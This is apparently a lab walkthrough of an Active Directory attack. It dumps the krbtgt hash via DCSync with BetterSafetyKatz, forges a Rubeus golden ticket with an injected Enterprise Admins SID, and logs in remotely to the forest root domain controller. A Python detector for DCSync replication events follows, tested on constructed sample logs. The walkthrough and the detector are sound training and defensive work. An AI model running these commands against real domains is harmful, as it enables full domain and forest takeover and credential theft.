
Let’s extract the us\krbtgt hash with DCSync:
.\BetterSafetyKatz.exe "lsadump::dcsync /user:us\krbtgt /domain:us.techcorp.local" "exit"

Now let’s forge a golden ticket and inject SID History into it. The extra SID passed in /sids ends in RID 519 (Enterprise Admins), and /ptt imports the ticket into the current session:
.\Rubeus.exe golden /user:Administrator /sid:S-1-5-21-210670787-2521448726-163245708 /groups:513 /sids:S-1-5-21-2781415573-3701854478-2406986946-519 /domain:us.techcorp.local /aes256:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5 /ptt

The ticket is imported; let’s list the cached tickets to validate:
klist

Now let’s log in to techcorp-dc:
winrs -r:techcorp-dc cmd
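
On the detection side, the DCSync step above shows up on the domain controller as Security event 4662 carrying the directory replication control-access GUIDs, requested by an account that is not a domain controller. The following is an added example, not part of the original write-up; it assumes directory service access auditing is enabled on the domain object, and the host and account names in the sample events (us-dc, US-DC$, studentuser1) are constructed.

```python
import re

# Control-access right GUIDs that appear in the Properties field of event 4662.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

def find_dcsync(events, replication_accounts):
    """Return one alert per 4662 event where a principal outside
    replication_accounts (DC machine accounts, approved sync accounts)
    exercised a directory replication right."""
    allowed = {a.lower() for a in replication_accounts}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = sorted(REPL_RIGHTS[g] for g in guids if g in REPL_RIGHTS)
        subject = ev.get("SubjectUserName", "")
        if not rights or subject.lower() in allowed:
            continue
        alerts.append({
            "host": ev.get("Computer"),
            "subject": ev.get("SubjectDomainName", "") + "\\" + subject,
            "rights": rights,
        })
    return alerts

# Constructed sample events (already parsed into dicts); names are hypothetical.
SAMPLE_EVENTS = [
    {"EventID": 4662, "Computer": "us-dc.us.techcorp.local",
     "SubjectDomainName": "US", "SubjectUserName": "US-DC$",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "us-dc.us.techcorp.local",
     "SubjectDomainName": "US", "SubjectUserName": "studentuser1",
     "Properties": "%%7688\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4624, "Computer": "us-dc.us.techcorp.local",
     "SubjectDomainName": "US", "SubjectUserName": "studentuser1"},
]

if __name__ == "__main__":
    for alert in find_dcsync(SAMPLE_EVENTS, {"US-DC$"}):
        print(alert)
```

Keep the allow-list limited to domain controller machine accounts and any directory synchronization service account that is expected to replicate; every other subject is worth an alert.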
